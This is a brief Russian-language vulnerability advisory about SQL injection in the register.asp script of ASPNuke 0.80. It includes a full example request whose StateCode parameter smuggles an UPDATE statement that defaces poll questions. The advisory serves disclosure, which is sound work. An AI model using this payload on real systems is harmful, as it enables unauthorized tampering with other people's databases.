Программа: ASPNuke 0.80
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием register.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
///module/account/register/register.asp?StateCode=0',0,0,0,0,0); update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password= 1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City= aaaaaaaaa&ZipCode=101010101&CountryID=0&Email= mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
